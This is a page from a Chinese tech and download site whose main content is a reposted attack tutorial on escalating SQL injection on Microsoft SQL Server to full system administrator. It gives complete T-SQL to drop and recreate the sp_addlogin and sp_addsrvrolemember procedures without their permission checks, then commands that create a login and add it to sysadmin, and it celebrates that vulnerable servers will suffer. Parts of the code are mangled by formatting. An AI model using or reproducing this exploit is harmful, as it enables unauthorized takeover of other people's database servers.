最近文章更新
- 1966年生产的广州 珠江 SB6-2型 ..
- HD6870/6850全面评测,让你大饱眼..
- 百万现金刚入门 中国7大奢华私人..
- 罕见4G希捷酷鱼系类万转SCSI服务..
- IBM 6x86MX PR333 CPU
- 采用MC68000 CPU的进口老计算机主..
- 1989年IBM-XT机软驱
- BC3型饱和标准电池拆解
- JUKO ST
- Kingston 品牌的CPU
- YAMAHA 719
- intel 30线 内存条
- intel mmx cpu和主板
- 首款xHCI 1.0正式版标准USB 3.0控..
- 《极品飞车:地下狂飙》纹理MOD视..
- USB接口加扩展子卡:影驰神秘GTX..
- 阿里巴巴将发布浏览器 核心不是W..
- 黄仁勋大秀NVIDIA LOGO纹身
- Google Earth上的奇特卫星图片
- 开火!讯景限量版HD 5970详细测试..
相关文章链接
本类文章排行
最新新闻资讯
本周下载排行
- ArcSoft TotalMedia Theatre 3 P..
- Windows 7 Build 7600 16385 RTM..
- 《姗姗来迟软件光盘+飞扬PE工具箱..
- MSDN Windows 7 RTL 7600 Ultima..
- Windows 7 Home Premium (x86) -..
- Windows Virtual PC (x86) - (Mu..
- MSDN Windows 7 Language Pack X..
- Windows 7 Language Pack (x64) ..
- Windows 7 Starter (x86) - DVD ..
- Windows 7 Professional (x86) -..
- Windows 7 Language Pack (x86) ..
- Windows 7 Home Premium (x64) -..
- Windows XP Mode (x86, x64) - (..
- 7127.0.090507-1820_x86fre_clie..
- DMG2ISO
本月下载排行
- ArcSoft TotalMedia Theatre 3 P..
- Windows 7 Build 7600 16385 RTM..
- 《姗姗来迟软件光盘+飞扬PE工具箱..
- MSDN Windows 7 RTL 7600 Ultima..
- MSDN Windows 7 Language Pack X..
- Windows 7 Home Premium (x86) -..
- Windows 7 Language Pack (x64) ..
- Windows 7 Professional (x86) -..
- 7127.0.090507-1820_x86fre_clie..
- Windows 7 Professional (x64) -..
- Windows 7 Starter (x86) - DVD ..
- Windows Virtual PC (x86) - (Mu..
- Windows 7 Ultimate (x64) - DVD..
- Lenovo Windows 7 Ultimate OEM ..
- Windows 7 Home Premium (x64) -..
- 阅览次数: 文章来源: 原文作者: 整理日期: 2010-05-22
MSSQL注入通杀,只要有注入点就有系统权限
MSSQL注入通杀,只要有注入点就有系统权限
不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:
先输入
DROP procedure sp_addlogin,
然后在IE里面输入
CREATE procedure sp_addlogin
@loginame sysname
,@passwd sysname = NULL
,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT
CONFIGURABLE???
,@deflanguage sysname = NULL
,@sid varbinary(16) = NULL
,@encryptopt varchar(20) = NULL
AS
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
SET nocount ON
Declare @ret int -- return value of sp call
-- DISALLOW USER TRANSACTION --
SET implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,’sp_addlogin’)
RETURN (1)
end
-- VALIDATE LOGIN NAME AS:
-- (1) Valid SQL Name (SQL LOGIN)
-- (2) No backslash (NT users only)
-- (3) Not a reserved login name
execute @ret = sp_validname @loginame
IF (@ret <> 0)
RETURN (1)<span id="more-952"></span>
IF (charindex(’\’, @loginame) > 0)
begin
raiserror(15006,-1,-1,@loginame)
RETURN (1)
end
--Note: different case sa is allowed.
IF (@loginame = ’sa’ OR lower(@loginame) IN (’public’))
begin
raiserror(15405, -1 ,-1, @loginame)
RETURN (1)
end
-- LOGIN NAME MUST NOT ALREADY EXIST --
IF EXISTS(SELECT * FROM master.dbo.syslogins WHERE loginname =
@loginame)
begin
raiserror(15025,-1,-1,@loginame)
RETURN (1)
end
-- VALIDATE DEFAULT DATABASE --
IF db_id(@defdb) IS NULL
begin
raiserror(15010,-1,-1,@defdb)
RETURN (1)
end
-- VALIDATE DEFAULT LANGUAGE --
IF (@deflanguage IS NOT NULL)
begin
Execute @ret = sp_validlang @deflanguage
IF (@ret <> 0)
RETURN (1)
end
ELSE
begin
SELECT @deflanguage = name FROM master.dbo.syslanguages
WHERE langid = @@default_langid --server default
LANGUAGE
IF @deflanguage IS NULL
SELECT @deflanguage = N’us_english’
end
-- VALIDATE SID IF GIVEN --
IF ((@sid IS NOT NULL) AND (datalength(@sid) <> 16))
begin
raiserror(15419,-1,-1)
RETURN (1)
end
else IF @sid IS NULL
SELECT @sid = newid()
IF (suser_sname(@sid) IS NOT NULL)
begin
raiserror(15433,-1,-1)
RETURN (1)
end
-- VALIDATE AND USE ENCRYPTION OPTION --
declare @xstatus smallint
SELECT @xstatus = 2 -- access
IF @encryptopt IS NULL
SELECT @passwd = pwdencrypt(@passwd)
else IF @encryptopt = ’skip_encryption_old’
begin
SELECT @xstatus = @xstatus | 0x800, -- old-style
encryption
@passwd = convert(sysname, convert(varbinary
(30), convert(varchar(30), @passwd)))
end
else IF @encryptopt <> ’skip_encryption’
begin
raiserror(15600,-1,-1,’sp_addlogin’)
RETURN 1
end
ATTEMPT THE INSERT OF THE NEW LOGIN --
INSERT INTO master.dbo.sysxlogins VALUES
(NULL, @sid, @xstatus, getdate(),
getdate(), @loginame, convert(varbinary(256), @passwd),
db_id(@defdb), @deflanguage)
IF @@error <> 0 -- this indicates we saw duplicate row
RETURN (1)
-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE
SYSLOGINS CHANGE --
exec(’USE master GRANT ALL TO NULL’)
-- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
RETURN (0) -- sp_addlogin
GO
OK,我们新建个用户exec master..sp_addlogin xwq
再DROP procedure sp_addsrvrolemember,然后在IE里输入
CREATE procedure sp_addsrvrolemember
@loginame sysname, -- login name
@rolename sysname = NULL -- server role name
AS
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
SET nocount ON
declare @ret int, -- return value of sp call
@rolebit smallint,
@ismem int
-- DISALLOW USER TRANSACTION --
SET implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,’sp_addsrvrolemember’)
RETURN (1)
end
-- CANNOT CHANGE SA ROLES --
IF @loginame = ’sa’
begin
raiserror(15405, -1 ,-1, @loginame)
RETURN (1)
end
-- OBTAIN THE BIT FOR THIS ROLE --
SELECT @rolebit = CASE @rolename
WHEN ’sysadmin’ THEN 16
WHEN ’securityadmin’ THEN 32
WHEN ’serveradmin’ THEN 64
WHEN ’setupadmin’ THEN 128
WHEN ’processadmin’ THEN 256
WHEN ’diskadmin’ THEN 512
WHEN ’dbcreator’ THEN 1024
WHEN ’bulkadmin’ THEN 4096
ELSE NULL END
-- ADD ROW FOR NT LOGIN IF NEEDED --
IF NOT EXISTS(SELECT * FROM master.dbo.syslogins WHERE
loginname = @loginame)
begin
execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
IF (@ret <> 0)
begin
raiserror(15007,-1,-1,@loginame)
RETURN (1)
end
end
-- Update ROLE MEMBERSHIP --
UPDATE master.dbo.sysxlogins SET xstatus = xstatus | @rolebit,
xdate2 = getdate()
WHERE name = @loginame AND srvid IS NULL
-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE
SYSLOGINS CHANGE --
exec(’USE master GRANT ALL TO NULL’)
raiserror(15488,-1,-1,@loginame,@rolename)
-- FINALIZATION: RETURN SUCCESS/FAILURE
RETURN (@@error) -- sp_addsrvrolemember
GO
接着再exec master..sp_addsrvrolemember xwq,sysadmin
这样就建立了一个SA用户了,用SQL连接器连接上就OK了。